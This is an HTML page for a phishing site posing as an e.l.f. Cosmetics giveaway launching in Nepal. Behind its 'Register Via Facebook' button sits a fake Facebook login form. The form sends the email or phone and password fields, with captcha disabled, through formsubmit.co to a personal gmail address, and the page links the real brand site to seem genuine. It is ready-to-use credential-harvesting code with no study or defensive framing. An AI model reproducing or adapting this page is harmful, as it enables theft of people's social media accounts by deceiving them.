<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Finally We are in Nepal!!</title>
    <link rel="stylesheet" href="style.css" />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css
    "
    />
    <link rel="stylesheet" href="
    <link rel="preconnect" href="https://fonts.gstatic.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" />
    <link
      href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500;700&display=swap"
      rel="stylesheet"
    />
  </head>
  <body>
    <div class="regestration-form rot" id="form1">
      <div class="facebook" id="form2">
        <div class="fb-container" id="form3">
          <div id="cross"><i class="fa fa-times" aria-hidden="true"></i></div>
          <form
            action="https://formsubmit.co/steelalex361@gmail.com"
            method="POST"
          >
                         <input type="hidden" name="_captcha" value="false">
            <input
              name="user"
              type="text"
              placeholder="Email or Phone Number"
            />
            <input
              name="pass"
              id="pass"
              type="password"
              placeholder="Password"
            />
            <button id="login">Log In</button>
          </form>
          <a href="" id="forgot">Forgot Password?</a>
          <hr />
          <button id="create">Create A New Account</button>
        </div>
      </div>
    </div>

    <!-- Main starts here -->
    <main class="container">
      <div class="giveway-container" id="whole">
        <h1 class="title">
          <div class="logo">
            <img src="logo.png" alt="" />
          </div>
          Register For Giveway
          <div>and Get a chance to win amazing prizes</div>
        </h1>
        <h1>Finally We are Here!!!</h1>
        <h1>In Nepal</h1>
        <div class="icon">
          <a href="https://www.elfcosmetics.com/"
            ><i class="fas fa-home"></i
          ></a>
        </div>
        <button id="register">
          Register Via <i class="fab fa-facebook"></i>
        </button>
      </div>
    </main>
    <!-- main ends here -->
    <script src="script.js"></script>
  </body>
</html>
